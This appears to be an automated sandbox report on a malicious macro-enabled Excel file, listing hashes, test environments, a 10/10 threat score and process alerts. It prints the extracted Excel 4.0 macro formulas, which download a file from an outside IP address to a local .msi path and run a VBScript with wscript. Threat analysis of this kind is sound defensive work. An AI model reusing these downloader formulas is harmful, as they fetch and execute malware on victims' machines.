General
-
Target
f6e90af5e9bec267c8aab9d3962be463
-
Size
6KB
-
Sample
231222-t61xnahhgk
-
MD5
f6e90af5e9bec267c8aab9d3962be463
-
SHA1
7f7d5d691148e44815dd46d6286f3befa9acba97
-
SHA256
2e5fa0a8e3d718fd20cd2fea531ac3a40ca19c4a97b30943ef46c6b5da00753b
-
SHA512
eb42d7ec3097ca2eacbc816a7fee7c26df88037fabfd4b87550c041a76d74df254551d898c97935c42e67e7bff794b42bdf80dd2713dbebeaf896ce0b694a09e
-
SSDEEP
192:NDS1uSnbrA2OmmfRe8UhHFBFYu4b98y/v+kw:NCuUM2wc1FY9b98y/2
Static task
static1
Behavioral task
behavioral1
Sample
f6e90af5e9bec267c8aab9d3962be463.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f6e90af5e9bec267c8aab9d3962be463.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
f6e90af5e9bec267c8aab9d3962be463
-
Size
6KB
-
MD5
f6e90af5e9bec267c8aab9d3962be463
-
SHA1
7f7d5d691148e44815dd46d6286f3befa9acba97
-
SHA256
2e5fa0a8e3d718fd20cd2fea531ac3a40ca19c4a97b30943ef46c6b5da00753b
-
SHA512
eb42d7ec3097ca2eacbc816a7fee7c26df88037fabfd4b87550c041a76d74df254551d898c97935c42e67e7bff794b42bdf80dd2713dbebeaf896ce0b694a09e
-
SSDEEP
192:NDS1uSnbrA2OmmfRe8UhHFBFYu4b98y/v+kw:NCuUM2wc1FY9b98y/2
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-